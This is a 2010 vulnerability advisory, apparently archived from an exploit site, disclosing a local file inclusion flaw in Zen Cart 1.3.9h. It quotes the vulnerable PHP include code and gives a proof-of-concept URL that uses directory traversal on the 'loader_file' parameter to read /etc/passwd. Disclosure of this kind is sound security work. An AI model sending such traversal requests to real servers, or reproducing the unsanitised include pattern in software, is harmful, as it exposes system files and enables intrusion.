扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 |
Zen Cart 1.3.9h Local File Inclusion Vulnerability NameZen Cart Vendorhttp://www.zen-cart.com Versions Affected 1.3.9h AuthorSalvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date2010-11-03 X. INDEX I.ABOUT THE APPLICATION II. DESCRIPTION III.ANALYSIS IV. SAMPLE CODE V.FIX I. ABOUT THE APPLICATION ________________________ Zen Cart truly is theartof e-commerce;free, user-friendly,opensourceshopping cart software. The ecommerce web site design program is being developed by a group of like-minded shop owners, programmers, designers, and consultants that think ecommerce web design couldbe and should be done differently. II. DESCRIPTION _______________ A parameter is not properly sanitised before beingused by the include() PHP's function. III. ANALYSIS _____________ Summary: A) Local File Inclusion A) Local File Inclusion _______________________ Input passed to the "loader_file" parameterin includes/initsystem.phpisnot properly verified before beingusedtoincludefiles. This can be exploited to includearbitraryfiles from local resourcesvia directory traversal attacks. Successful exploitation requires that register_globals is set to On. The following is the vulnerable code: <?php $base_dir = DIR_WS_INCLUDES . 'auto_loaders/'; if (file_exists(DIR_WS_INCLUDES . 'auto_loaders/overrides/' . $loader_file)) { $base_dir = DIR_WS_INCLUDES . 'auto_loaders/overrides/'; } include($base_dir . $loader_file); IV. SAMPLE CODE _______________ A) Local File Inclusion http://site/path/includes/initsystem.php?loader_file=../../../../../../../../etc/passwd V. FIX ______ No fix. |
体验盒子
